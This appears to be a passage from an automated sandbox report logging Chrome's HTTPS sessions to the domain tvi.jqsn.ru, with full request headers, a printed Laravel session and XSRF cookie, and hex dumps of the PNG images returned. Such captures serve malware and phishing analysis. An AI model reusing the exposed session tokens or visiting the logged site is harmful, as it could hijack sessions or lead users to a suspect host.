                                                                                                                          Content-Disposition: inline; filename="klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJMs92ognJtH6zLpinCEamufNcI5WtwnohbNyLsAnzW2Syem5jgrTd1zf3ouKbkZ1zj%2FCYHB1Uu%2BEq00aZf%2B%2Fx%2FY1iN0LuQ%2FcXJuaSkpAt%2Fi1iMiDPFYWWVN3T0CSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854fa5fc26765-ATL
                                                                                                                          2024-04-17 00:34:55 UTC606INData Raw: 35 37 38 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1
                                                                                                                          Data Ascii: 578PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?
                                                                                                                          2024-04-17 00:34:55 UTC801INData Raw: 5a 1c 81 cf 9e 14 09 96 34 f5 90 bf c8 41 fa 3e ce aa d1 58 f0 9d 61 2f f4 19 10 30 4e 2e 26 3f 71 f4 eb ee c9 c5 fd bd b3 e8 0b 46 23 77 26 6f 88 22 4c 3a 96 b2 e8 6c 0e 63 cc 86 e0 ac 8e 9a 78 bb 50 ea 86 ee d1 90 40 65 d2 0b 26 01 26 7c 59 a0 10 ac 21 e8 8f 69 d1 f4 00 ee 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c
                                                                                                                          Data Ascii: Z4A>Xa/0N.&?qF#w&o"L:lcxP@e&&|Y!igac1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,
                                                                                                                          2024-04-17 00:34:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          53192.168.2.449802104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:53 UTC1476OUTGET /gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:55 UTC764INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e9nHiUL1gtZlGaQAq9v5l4uqVG5tpEW64V6Znf4MUy%2FACnicOCJC5IllpcUheAgqV37BniqeX2db%2F401eP3OLstZnYl%2Fy1Wae4pLhsN%2BJ8v7NB4JR5oiMm9t6Xh21g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854fe4a1c1807-ATL
                                                                                                                          2024-04-17 00:34:55 UTC605INData Raw: 64 30 39 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6
                                                                                                                          Data Ascii: d09PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 31 7b ad 59 a4 95 39 6e 67 fe 04 f4 53 a1 89 54 46 83 49 cd 1a 3b 03 6f 26 35 41 ad 1c 9a a8 bc 26 01 77 02 b7 02 7f 24 35 4a cd 0e 4d 24 49 92 24 49 92 24 49 92 24 d5 9c cd 00 e5 d2 03 bc 01 d8 b7 51 3b 92 b6 49 51 f3 c6 91 1a 39 6e 05 6e 6c fc 5a dd 65 08 b0 13 b0 1b a9 01 6a 07 60 68 64 a0 0a 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02
                                                                                                                          Data Ascii: 1{Y9ngSTFI;o&5A&w$5JM$I$I$I$Q;IQ9nnlZej`hd{=p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*g
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: a5 d2 13 1d 20 a3 77 03 3f 06 86 46 07 91 4a e2 19 e0 cb c0 3b 81 b7 07 67 91 ca e4 7f 81 77 00 13 a2 83 48 92 24 49 92 24 49 92 24 49 f3 d4 a5 81 e3 30 e0 62 60 60 74 10 49 52 25 3c 0e ec d9 78 2b 49 92 24 49 92 24 49 92 24 85 eb 8d 0e 90 c1 d1 c0 25 d8 bc 21 49 5a 7a eb 03 b7 03 5b 45 07 91 24 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92
                                                                                                                          Data Ascii: w?FJ;gwH$I$I$I0b``tIR%<x+I$I$I$%!IZz[E$I$I$IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 0a 32 35 36 66 0d 0a 81 b4 b2 94 24 49 92 24 49 92 24 49 92 54 19 eb 00 93 88 9f 6c eb 74 5d 0b ac 91 61 fc d4 59 cb 93 9a 6e ba 7d 8b 88 4e d7 6c e0 4a dc 26 a5 aa f6 07 c6 13 7f 1e 75 ba 7e 96 63 f0 24 49 92 24 49 92 24 49 92 a4 4e e8 01 ae 23 7e 92 ad 93 f5 32 70 78 e3 73 57 75 f5 02 07 01 0f 11 7f 4e d5 b9 66 03 57 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13
                                                                                                                          Data Ascii: 256f$I$I$ITlt]aYn}NlJ&u~c$I$I$IN#~2pxsWuNfW_\@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 52 5b 03 18 4b fc 79 17 59 d7 00 23 db 1d 48 29 d0 10 e0 1f c4 5f 4b 39 ea e0 cc 63 23 49 92 24 49 92 24 49 92 a4 2e f3 7a e2 27 bd 72 d4 5f 80 01 99 c7 46 e5 b5 12 f0 00 f1 e7 5d 54 cd 01 ce 00 7a db 1d 48 a9 04 de 08 cc 26 fe ba 6a b7 ee c8 3d 30 92 24 49 92 24 49 92 24 49 ea 2e 3f 20 7e d2 ab dd 9a 01 6c 95 7b 60 54 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b
                                                                                                                          Data Ascii: R[KyY#H)_K9c#I$I$I.z'r_F]TzH&j=0$I$I$I.? ~l{`TZv(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<k
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: a4 ee d6 03 fc 99 f8 7b 74 bb f5 12 b0 72 e6 b1 91 16 e5 63 c4 9f f3 39 ea 90 dc 03 23 29 d6 68 aa b7 2c d0 bc 9a de c8 af 7a fa 04 f1 e7 58 a7 6a 1a 69 89 73 49 cd f9 1a f1 d7 6f ab 75 79 01 e3 21 95 d9 86 a4 c6 db 47 89 bf fe ac f9 75 1f 70 3c e9 29 2d 49 2a 93 cd 48 4f 60 46 7f 9d b4 aa 55 8f 01 97 00 ff 45 fa de 43 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1
                                                                                                                          Data Ascii: {trc9#)h,zXjisIouy!Gup<)-I*HO`FUECnr\uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JS
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 4b d5 35 12 f8 31 f0 2b 60 8d e0 2c ea 0e 07 93 26 b4 5c 8d 43 92 54 77 1b 02 57 91 9a cb 37 0d ce 22 49 92 24 49 2a 91 fe 1a 38 d6 01 d6 ee 74 90 0c ae c5 09 f1 3a 38 09 d8 2e 3a 44 81 ee 03 0e 04 66 46 07 91 ba d8 ef 80 d9 d1 21 5a b0 4b 74 00 75 95 fd 49 13 e9 1f 88 0e a2 ae 33 9a b4 1a c7 c5 c0 f0 e0 2c 92 24 15 6d 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32
                                                                                                                          Data Ascii: K51+`,&\CTwW7"I$I*8t:8.:DfF!ZKtuI3,$moYY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 3f a2 03 68 a9 6c 07 7c 3c 3a 44 66 53 81 83 80 57 a2 83 48 ca e2 29 60 52 74 88 26 55 f1 be ad e2 1c 0d 7c 2b 3a 84 54 62 a7 03 ef 8a 0e 21 49 52 87 0d 00 2e 05 0e 89 0e 22 49 92 24 49 25 f1 1b 60 6e 1b 75 63 3f ff e6 53 fd fc bd c9 c0 06 4b c8 f2 5e 60 7a 3f 1f 3b be ca 0d 1c 8f 46 07 d0 12 0d 00 ce 6f bc ad 93 a3 70 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0
                                                                                                                          Data Ascii: ?hl|<:DfSWH)`Rt&U|+:Tb!IR."I$I%`nuc?SK^`z?;FopnvO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-V
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 74 88 9a 98 02 5c 0d fc 8c d4 b4 51 c5 49 b1 b9 c0 83 8d 3a 9f b4 e4 de de c0 3b 1a b5 72 5c b4 da 18 0c 5c 44 5a f5 64 76 70 16 49 dd ed 24 e0 cc e8 10 1d b0 2c 69 75 a9 91 c0 28 60 0d d2 c3 21 6b 93 b6 12 db 02 57 9c eb b4 23 80 eb 49 df 37 49 92 24 49 92 da 77 26 fd 37 70 2c f1 e7 fe d3 49 2f 0a 57 a5 7c 2a ae 5c b6 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28
                                                                                                                          Data Ascii: t\QI:;r\\DZdvpI$,iu(`!kW#I7I$Iw&7p,I/W|*\%}^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 33 e9 e7 af 09 c1 59 ca ae 17 38 3b 3a 84 24 49 92 24 75 8b 5e aa f7 44 d9 ac e8 00 5d ec 3d a4 49 ed aa 9b 0a 7c 36 3a 84 4a 6b 28 69 59 f9 7b 48 2f e8 75 da 09 b8 aa 42 a4 aa 2d a5 6c 03 47 b5 6d 0a 7c 3a 3a 44 09 3d 09 ec 0e 7c 9d ea 5d 93 55 36 06 d8 1e f8 59 74 90 12 3a 11 bf de 4a 52 1d cd 25 6d 95 b9 09 a9 71 5f 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa
                                                                                                                          Data Ascii: 3Y8;:$I$u^D]=I|6:Jk(iY{H/uB-lGm|::D=|]U6Yt:JR%mq_p`tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          54192.168.2.449803172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:53 UTC1099OUTGET /wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:55 UTC736INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dtvdGcFHXub5nEUusXOAI2B772LSNyuIs1rVNzfeMnLufzbjhNU4i5%2BOML3zeHlFcnspX%2F2kGJ9Fe9884ukFRe3wO2tDu3lLPCUatUwByvxXRlYaC5mVzg7XEcwjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854fe8cbd6768-ATL
                                                                                                                          2024-04-17 00:34:55 UTC237INData Raw: 65 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: e7PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`
                                                                                                                          2024-04-17 00:34:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          55192.168.2.449805172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1095OUTGET /qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
